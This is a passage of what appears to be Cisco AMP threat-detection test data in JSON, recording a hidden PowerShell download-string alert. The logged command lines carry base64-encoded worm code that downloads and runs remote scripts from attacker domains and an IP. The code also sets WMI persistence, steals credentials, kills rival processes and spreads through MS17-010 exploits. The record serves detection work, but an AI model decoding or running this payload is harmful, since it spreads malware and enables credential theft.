ALQAyAF0AIAAtAGUAcQAgACcARQBTAFQAQQBCAEwASQBTAEgARQBEACcAKQAgAC0AYQBuAGQAIAAgACgAJABpACAALQBuAGUAIAAnADEAMgA3AC4AMAAuADAALgAxACcAKQAgAC0AYQBuAGQAIAAoACQAaQBwAHMAIAAtAG4AbwB0AGMAbwBuAHQAYQBpAG4AcwAgACQAaQApACkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGkAcABzACsAPQAkAGkADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKACAAIAAgACAAaQBmACAAKAAoAFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFQAaQBjAGsAQwBvAHUAbgB0AC0AJABzAHQAaQBtAGUAKQAvADEAMAAwADAAIAAtAGcAdAAgADUANAAwADAAKQB7AGIAcgBlAGEAawB9AA0ACgAgACAAIAAgAGYAbwByAGUAYQBjAGgAIAAoACQAaQBwACAAaQBuACAAJABpAHAAcwApAA0ACgAgACAAIAAgAHsAIAAgACAADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACgAWwBFAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoAVABpAGMAawBDAG8AdQBuAHQALQAkAHMAdABpAG0AZQApAC8AMQAwADAAMAAgAC0AZwB0ACAANQA0ADAAMAApAHsAYgByAGUAYQBrAH0ADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACQAaQBwACAALQBlAHEAIAAkAEkAUABBAGQAZAByAGUAcwBzACkAewBjAG8AbgB0AGkAbgB1AGUAfQAgACAAIAAgACAADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACgAVABlAHMAdAAtAEMAbwBuAG4AZQBjAHQAaQBvAG4AIAAkAGkAcAAgAC0AYwBvAHUAbgB0ACAAMQApACAALQBuAGUAIAAkAG4AdQBsAGwAIAAgAC0AYQBuAGQAIAAkAGkAcABzAHUAIAAtAG4AbwB0AGMAbwBuAHQAYQBpAG4AcwAgACQAaQBwACkAIAANAAoAIAAgACAAIAAgACAAIAAgAHsAIAAgACAADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAcgBlAD0AMAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAGEALgBjAG8AdQBuAHQAIAAtAG4AZQAgADAAKQAgACAAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAewAkAHIAZQAgAD0AIAB0AGUAcwB0AC0AaQBwACAALQBpAHAAIAAkAGkAcAAgAC0AYwByAGUAZABzACAAJABhACAAIAAtAG4AaQBjACAAJABuAGkAYwAgAC0AbgB0AGwAbQAgACQATgBUAEwATQAgAH0ADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAJAByAGUAIAAtAGUAcQAgADEAKQB7ACQAaQBwAHMAdQAgAD0AJABpAHAAcwB1ACAAKwAiACAAIgArACQAaQBwAH0ADQAKAAkACQAJAGUAbABzAGUADQAKAAkACQAJAHsADQAKAAkACQAJAAkAJAB2AHUAbAA9AFsAUABpAG4AZwBDAGEAcwB0AGwAZQAuAFMAYwBhAG4AbgBlAHIAcwAuAG0AMQA3AHMAYwBdADoAOgBTAGMAYQBuACgAJABpAHAAKQAJAAkACQAJAA0ACgAJAAkACQAJAGkAZgAgACgAJAB2AHUAbAAgAC0AYQBuAGQAIAAkAGkAMQA3ACAALQBuAG8AdABjAG8AbgB0AGEAaQBuAHMAIAAkAGkAcAApAA0ACgANAAoACQAJAAkACQB7AA0ACgAJAAkACQAJAAkAJAByAGUAcwA9AGUAYgA3ACAAJABpAHAAIAAkAHMAYwANAAoACQAJAAkACQAJAGkAZgAgACgAIQAoACQAcgBlAHMAIAAtAGUAcQAgACQAdAByAHUAZQApACkADQAKAAkACQAJAAkACQB7AGUAYgA4ACAAJABpAHAAIAAkAHMAYwB9AA0ACgAJAAkACQAJAAkAJABpADEANwAgAD0AIAAkAGkAMQA3ACAAKwAgACIAIAAiACsAJABpAHAADQAKAAkACQAJAAkAfQANAAoACQAJAAkAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAfQANAAoAIAB9ACAAIAAgACAAIAAgACAADQAKACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE0AYQBuAGEAZwBlAG0AZQBuAHQALgBNAGEAbgBhAGcAZQBtAGUAbgB0AEMAbABhAHMAcwAoACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApACAAIAANAAoAJABTAHQAYQB0AGkAYwBDAGwAYQBzAHMALgBTAGUAdABQAHIAbwBwAGUAcgB0AHkAVgBhAGwAdQBlACgAJwBpAHAAcwB1ACcAIAAsACQAaQBwAHMAdQApAA0ACgAkAFMAdABhAHQAaQBjAEMAbABhAHMAcwAuAFAAdQB0ACgAKQANAAoAJABTAHQAYQB0AGkAYwBDAGwAYQBzAHMALgBTAGUAdABQAHIAbwBwAGUAcgB0AHkAVgBhAGwAdQBlACgAJwBpADEANwAnACAALAAkAGkAMQA3ACkADQAKACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAC4AUAB1AHQAKAApAA==","parent_app":"WmiPrvSE.exe","parent_app_path":"C:\\Windows\\System32\\wbem","parent_pid":2236,"parent_puid":132461352663910600,"parent_user":"SYSTEM","parent_user_sid":"010100000000000512000000","pid":10724,"puid":132465072105597400,"ts":1602033881727175700,"user":"user@testdomain.com","user_sid":"010100000000000512000000"}}],"limited":false,"matched":1},"schema":"endpoint","schema_epoch":2,"sig_id":20200719101800,"sig_rev":1},"detection":"apde:20200719101800","end_ts":1610640884,"engine":"apde","id":"cF3A8bacac","name":"PowerShell Download String","observables":{"file":[{"md5":"d683c112190f4b4c6d477d693ee88e35","name":"WmiPrvSE.exe","path":"C:\\Windows\\System32\\wbem","properties":{"copyright":"© Microsoft Corporation. All rights reserved.","file_version":"10.0.14409.1005","product":"Microsoft® Windows® Operating System","product_version":"10.0.14409.1005"},"sha1":"67858ead93feed62c0b1865369840e6e8086f53b","sha256":"385892542cc5a996488262b193061feac4615d66657157c3d4a76251911da334","size":425984,"type_id":1},{"md5":"a575a7610e5f003cc36df39e07c4ba7d","name":"powershell.exe","path":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0","properties":{"copyright":"© Microsoft Corporation. All rights reserved.","file_version":"10.0.14409.1005","product":"Microsoft® Windows® Operating System","product_version":"10.0.14409.1005"},"sha1":"88e7cdc0b75364418e11b2c53f772085f1b61d1e","sha256":"006cef6ef6488721895d93e4cef7fa0709c2692d74bde1e22e2a8719b2a86218","size":443392,"type_id":1}]},"remediated":false,"severity":"medium","silent":true,"start_ts":1610640884,"tactics":["TA0002","TA0005"],"techniques":["T1059"],"type":"activity","normalized":{"observables":{"file":{"name":["wmiprvse.exe","powershell.exe"],"path":["c:\\windows\\system32\\wbem","c:\\windows\\system32\\windowspowershell\\v1.0"]}},"name":"powershell download string"},"ts":1610640884},"tactics":["TA0002","TA0005"],"techniques":["T1059"]}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6880683125978957000,"timestamp":1610640884,"timestamp_nanoseconds":791000000,"date":"2021-01-14T16:14:44+00:00","event_type":"Threat Detection","event_type_id":553648222,"detection":"PowerShell Download String","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_BP_WMIPRVSE","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"be:b0:d5:89:e2:96"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"bp_data":{"audit":false,"details":{"actions":[],"eng_epoch":1,"eng_ver":"0.9.0.104","matched_activity":{"events":[{"process:start":{"app":"powershell.exe","app_path":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0","args":["powershell.exe","-NoP","-NonI","-W","Hidden","-E","JABzAGUAPQBAACgAJwB1AHAAZABhAHQAZQAuAHcAaQBuAGQAbwB3AHMAZABlAGYAZQBuAGQAZQByAGgAbwBzAHQALgBjAGwAdQBiACcALAAnAGkAbgBmAG8ALgB3AGkAbgBkAG8AdwBzAGQAZQBmAGUAbgBkAGUAcgBoAG8AcwB0AC4AYwBsAHUAYgAnACwAJwA4ADcALgAxADIAMQAuADkAOAAuADIAMQA1ACcAKQANAAoAJABuAGkAYwA9ACcAdwB3AHcALgB3AGkAbgBkAG8AdwBzAGQAZQBmAGUAbgBkAGUAcgBoAG8AcwB0AC4AYwBsAHUAYgAnAA0ACgBmAG8AcgBlAGEAYwBoACgAJAB0ACAAaQBuACAAJABzAGUAKQANAAoAewANAAoAIAAgACAAIAAkAHAAaQBuAD0AdABlAHMAdAAtAGMAbwBuAG4AZQBjAHQAaQBvAG4AIAAkAHQADQAKACAAIAAgACAAaQBmACAAKAAkAHAAaQBuACAALQBuAGUAIAAkAG4AdQBsAGwAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAJABuAGkAYwA9ACQAdAANAAoAIAAgACAAIAAgACAAIAAgAGIAcgBlAGEAawANAAoAIAAgACAAIAB9AA0ACgB9AA0ACgAkAG4AaQBjAD0AJABuAGkAYwArACIAOgA4ADAAMAAwACIADQAKACQAdgBlAHIAPQAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AJABuAGkAYwAvAHYAZQByAC4AdAB4AHQAIgApAC4AVAByAGkAbQAoACkAIAANAAoAaQBmACgAJAB2AGUAcgAgAC0AbgBlACAAJABuAHUAbABsACkAewAgAA0ACgAgACAAIAAgAGkAZgAoACQAdgBlAHIAIAAtAG4AZQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAdgBlAHIAJwBdAC4AVgBhAGwAdQBlACkAewAgAA0ACgAgACAAIAAgACAAIAAgACAASQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AJABuAGkAYwAvAGkAbgBmAG8ANgAuAHAAcwAxACIAKQANAAoAIAAgACAAIAAgACAAIAAgAHIAZQB0AHUAcgBuACAADQAKACAAIAAgACAAfQAgAA0ACgB9AA0ACgAkAHMAdABpAG0AZQA9AFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFQAaQBjAGsAQwBvAHUAbgB0AA0ACgAkAGYAdQBuAHMAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBmAHUAbgBzACcAXQAuAFYAYQBsAHUAZQAgACAAIAAgACAAIAAgACAADQAKACQAZABlAGYAdQBuAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABmAHUAbgBzACkAKQANAAoAaQBlAHgAIAAkAGQAZQBmAHUAbgANAAoADQAKAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABfAF8ARgBpAGwAdABlAHIAVABvAEMAbwBuAHMAdQBtAGUAcgBCAGkAbgBkAGkAbgBnACAALQBOAGEAbQBlAHMAcABhAGMAZQAgAHIAbwBvAHQAXABzAHUAYgBzAGMAcgBpAHAAdABpAG8AbgAgAHwAIABXAGgAZQByAGUALQBPAGIAagBlAGMAdAAgAHsAJABfAC4AZgBpAGwAdABlAHIAIAAtAG4AbwB0AG0AYQB0AGMAaAAgACcAUwB5AHMAdABlAG0AIABFAHYAZQBuAHQAcwAgAEwAbwBnACcAfQAgAHwAUgBlAG0AbwB2AGUALQBXAG0AaQBPAGIAagBlAGMAdAANAAoAJABkAGkAcgBwAGEAdABoAD0AJABlAG4AdgA6AFMAeQBzAHQAZQBtAFIAbwBvAHQAKwAnAFwAcwB5AHMAdABlAG0AMwAyACcAIAAgACAADQAKAGkAZgAgACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAkAGQAaQByAHAAYQB0AGgAIAApACkAewANAAoACQAkAGQAaQByAHAAYQB0AGgAPQAkAGUAbgB2ADoAUwB5AHMAdABlAG0AUgBvAG8AdAANAAoAfQANAAoAaQBmACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHAAMQAyADAALgBkAGwAbAAnACkAKQApAA0ACgANAAoAewBzAGUAbgB0AGYAaQBsAGUAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHAAMQAyADAALgBkAGwAbAAnACkAIAAnAHYAYwBwACcAfQANAAoAaQBmACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHIAMQAyADAALgBkAGwAbAAnACkAKQApAA0ACgB7AHMAZQBuAHQAZgBpAGwAZQAgACgAJABkAGkAcgBwAGEAdABoACsAJwBcAG0AcwB2AGMAcgAxADIAMAAuAGQAbABsACcAKQAgACcAdgBjAHIAJwB9AA0ACgANAAoAWwBhAHIAcgBhAHkAXQAkAHAAcwBpAGQAcwA9ACAAZwBlAHQALQBwAHIAbwBjAGUAcwBzACAALQBuAGEAbQBlACAAcABvAHcAZQByAHMAaABlAGwAbAAgAHwAcwBvAHIAdAAgAGMAcAB1ACAALQBEAGUAcwBjAGUAbgBkAGkAbgBnAHwAIABGAG8AcgBFAGEAYwBoAC0ATwBiAGoAZQBjAHQAIAB7ACQAXwAuAGkAZAB9AA0ACgAkAHQAYwBwAGMAbwBuAG4AIAA9ACAAbgBlAHQAcwB0AGEAdAAgAC0AYQBuAG8AcAAgAHQAYwBwACAADQAKACQAZQB4AGkAcwB0AD0AJABGAGEAbABzAGUADQAKAGkAZgAgACgAJABwAHMAaQBkAHMAIAAtAG4AZQAgACQAbgB1AGwAbAAgACkADQAKAHsADQAKACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAJAB0ACAAaQBuACAAJAB0AGMAcABjAG8AbgBuACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAbABpAG4AZQAgAD0AJAB0AC4AcwBwAGwAaQB0ACgAJwAgACcAKQB8ACAAPwB7ACQAXwB9AA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAGwAaQBuAGUAIAAtAGUAcQAgACQAbgB1AGwAbAApAA0ACgAgACAAIAAgACAAIAAgACAAewBjAG8AbgB0AGkAbgB1AGUAfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAKAAkAHAAcwBpAGQAcwBbADAAXQAgAC0AZQBxACAAJABsAGkAbgBlAFsALQAxAF0AKQAgAC0AYQBuAGQAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiAEUAUwBUAEEAQgBMAEkAUwBIAEUARAAiACkAIAAtAGEAbgBkACAAKAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAOAAwACAAIgApACAALQBvAHIAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQA0ADQANAA0ACIAKQApACAAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAZQB4AGkAcwB0AD0AJAB0AHIAdQBlAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABiAHIAZQBhAGsADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKAH0ADQAKAEsAaQBsAGwAQgBvAHQAKAAnAGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkADQAKAGYAbwByAGUAYQBjAGgAIAAoACQAdAAgAGkAbgAgACQAdABjAHAAYwBvAG4AbgApAA0ACgAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAkAGwAaQBuAGUAIAA9ACQAdAAuAHMAcABsAGkAdAAoACcAIAAnACkAfAAgAD8AewAkAF8AfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAIQAoACQAbABpAG4AZQAgAC0AaQBzACAAWwBhAHIAcgBhAHkAXQApACkAewBjAG8AbgB0AGkAbgB1AGUAfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAKAAkAGwAaQBuAGUAWwAtADMAXQAgAC0AbgBlACAAJABuAHUAbABsACkAIAAtAGEAbgBkACAAJAB0AC4AYwBvAG4AdABhAGkAbgBzACgAIgBFAFMAVABBAEIATABJAFMASABFAEQAIgApACAALQBhAG4AZAAgACgAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQAxADEAMQAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADIAMgAyADIAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgAzADMAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANAA0ADQANAAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADUANQA1ADUAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA2ADYANgA2ACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANwA3ADcANwAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADgAOAA4ADgAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA5ADkAOQA5ACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQA0ADQAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANAA1ADUANgAwACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANgA1ADMAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANQA1ADMAMwA1ACIAKQApACkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGUAdgBpAGQAPQAkAGwAaQBuAGUAWwAtADEAXQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAARwBlAHQALQBQAHIAbwBjAGUAcwBzACAALQBpAGQAIAAkAGUAdgBpAGQAIAB8ACAAcwB0AG8AcAAtAHAAcgBvAGMAZQBzAHMAIAAtAGYAbwByAGMAZQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAfQANAAoAaQBmACAAKAAhACQAZQB4AGkAcwB0ACAALQBhAG4AZAAgACgAJABwAHMAaQBkAHMALgBjAG8AdQBuAHQAIAAtAGwAZQAgADgAKQApAA0ACgB7ACAAIAAgAA0ACgAgACAAIAAgACQAYwBtAGQAbQBvAG4APQAiAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAE4AbwBQACAALQBOAG8AbgBJACAALQBXACAASABpAGQAZABlAG4AIABgACIAYAAkAG0AbwBuACAAPQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAbQBvAG4AJwBdAC4AVgBhAGwAdQBlADsAYAAkAGYAdQBuAHMAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBmAHUAbgBzACcAXQAuAFYAYQBsAHUAZQAgADsAaQBlAHgAIAAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAGAAJABmAHUAbgBzACkAKQApADsASQBuAHYAbwBrAGUALQBDAG8AbQBtAGEAbgBkACAAIAAtAFMAYwByAGkAcAB0AEIAbABvAGMAawAgAGAAJABSAGUAbQBvAHQAZQBTAGMAcgBpAHAAdABCAGwAbwBjAGsAIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAQAAoAGAAJABtAG8AbgAsACAAYAAkAG0AbwBuACwAIAAnAFYAbwBpAGQAJwAsACAAMAAsACAAJwAnACwAIAAnACcAKQBgACIAIgANAAoAIAAgACAAIAAkAHYAYgBzACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAEMAbwBtAE8AYgBqAGUAYwB0ACAAVwBTAGMAcgBpAHAAdAAuAFMAaABlAGwAbAANAAoACQAkAHYAYgBzAC4AcgB1AG4AKAAkAGMAbQBkAG0AbwBuACwAMAApACAAIAANAAoAfQANAAoADQAKACQATgBUAEwATQA9ACQARgBhAGwAcwBlAA0ACgAkAG0AaQBtAGkAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBtAGkAbQBpACcAXQAuAFYAYQBsAHUAZQAgAA0ACgAkAGEALAAgACQATgBUAEwATQA9ACAARwBlAHQALQBjAHIAZQBkAHMAIAAkAG0AaQBtAGkAIAAkAG0AaQBtAGkADQAKACAAIAAgACAAIAAgACAADQAKACQATgBlAHQAdwBvAHIAawBzACAAPQAgAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABXAGkAbgAzADIAXwBOAGUAdAB3AG8AcgBrAEEAZABhAHAAdABlAHIAQwBvAG4AZgBpAGcAdQByAGEAdABpAG8AbgAgAC0ARQBBACAAUwB0AG8AcAAgAHwAIAA/ACAAewAkAF8ALgBJAFAARQBuAGEAYgBsAGUAZAB9ACAAIAAgACAADQAKACQAaQBwAHMAdQAgAD0AIAAoAFsAVwBtAGkAQwBsAGEAcwBzAF0AIAAnAHIAbwBvAHQAXABkAGUAZgBhAHUAbAB0ADoAYwBvAHIAZQBkAHAAdQBzAHMAdgByACcAKQAuAFAAcgBvAHAAZQByAHQAaQBlAHMAWwAnAGkAcABzAHUAJwBdAC4AVgBhAGwAdQBlACAADQAKACQAaQAxADcAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBpADEANwAnAF0ALgBWAGEAbAB1AGUADQAKACQAcwBjAGIAYQA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBzAGMAJwBdAC4AVgBhAGwAdQBlAA0ACgBbAGIAeQB0AGUAWwBdAF0AJABzAGMAPQBbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABzAGMAYgBhACkAIAAgACAAIAAgAA0ACgBmAG8AcgBlAGEAYwBoACAAKAAkAE4AZQB0AHcAbwByAGsAIABpAG4AIAAkAE4AZQB0AHcAbwByAGsAcwApACAADQAKAHsAIAAgACAAIAAgACAAIAAgACAAIAAgACAADQAKACAAIAAgACAADQAKACAAIAAgACAAJABJAFAAQQBkAGQAcgBlAHMAcwAgACAAPQAgACQATgBlAHQAdwBvAHIAawAuAEkAcABBAGQAZAByAGUAcwBzAFsAMABdACAAIAANAAoACQBpAGYAIAAoACQASQBQAEEAZABkAHIAZQBzAHMAIAAtAG0AYQB0AGMAaAAgACcAXgAxADYAOQAuADIANQA0ACcAKQB7AGMAbwBuAHQAaQBuAHUAZQB9ACAACQANAAoAIAAgACAAIAAkAFMAdQBiAG4AZQB0AE0AYQBzAGsAIAAgAD0AIAAkAE4AZQB0AHcAbwByAGsALgBJAFAAUwB1AGIAbgBlAHQAWwAwAF0AIAAgAA0ACgAgACAAIAAgACQAaQBwAHMAPQBHAGUAdAAtAE4AZQB0AHcAbwByAGsAUgBhAG4AZwBlACAAJABJAFAAQQBkAGQAcgBlAHMAcwAgACQAUwB1AGIAbgBlAHQATQBhAHMAawANAAoACQAkAHQAYwBwAGMAbwBuAG4AIAA9ACAAbgBlAHQAcwB0AGEAdAAgAC0AYQBuAG8AcAAgAHQAYwBwACAADQAKAAkAZgBvAHIAZQBhAGMAaAAgACgAJAB0ACAAaQBuACAAJAB0AGMAcABjAG8AbgBuACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAbABpAG4AZQAgAD0AJAB0AC4AcwBwAGwAaQB0ACgAJwAgACcAKQB8ACAAPwB7ACQAXwB9AA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAhACgAJABsAGkAbgBlACAALQBpAHMAIABbAGEAcgByAGEAeQBdACkAKQB7AGMAbwBuAHQAaQBuAHUAZQB9AA0ACgAJAAkAaQBmACAAKAAkAGwAaQBuAGUALgBjAG8AdQBuAHQAIAAtAGwAZQAgADQAKQB7AGMAbwBuAHQAaQBuAHUAZQB9AA0ACgAJAAkAJABpAD0AJABsAGkAbgBlAFsALQAzAF0ALgBzAHAAbABpAHQAKAAnADoAJwApAFsAMABdAA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAgACgAJABsAGkAbgBlAFsALQAyAF0AIAAtAGUAcQAgACcARQBTAFQAQQBCAEwASQBTAEgARQBEACcAKQAgAC0AYQBuAGQAIAAgACgAJABpACAALQBuAGUAIAAnADEAMgA3AC4AMAAuADAALgAxACcAKQAgAC0AYQBuAGQAIAAoACQAaQBwAHMAIAAtAG4AbwB0AGMAbwBuAHQAYQBpAG4AcwAgACQAaQApACkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGkAcABzACsAPQAkAGkADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKACAAIAAgACAAaQBmACAAKAAoAFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFQAaQBjAGsAQwBvAHUAbgB0AC0AJABzAHQAaQBtAGUAKQAvADEAMAAwADAAIAAtAGcAdAAgADUANAAwADAAKQB7AGIAcgBlAGEAawB9AA0ACgAgACAAIAAgAGYAbwByAGUAYQBjAGgAIAAoACQAaQBwACAAaQBuACAAJABpAHAAcwApAA0ACgAgACAAIAAgAHsAIAAgACAADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACgAWwBFAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoAVABpAGMAawBDAG8AdQBuAHQALQAkAHMAdABpAG0AZQApAC8AMQAwADAAMAAgAC0AZwB0ACAANQA0ADAAMAApAHsAYgByAGUAYQBrAH0ADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACQAaQBwACAALQBlAHEAIAAkAEkAUABBAGQAZAByAGUAcwBzACkAewBjAG8AbgB0AGkAbgB1AGUAfQAgACAAIAAgACAADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACgAVABlAHMAdAAtAEMAbwBuAG4AZQBjAHQAaQBvAG4AIAAkAGkAcAAgAC0AYwBvAHUAbgB0ACAAMQApACA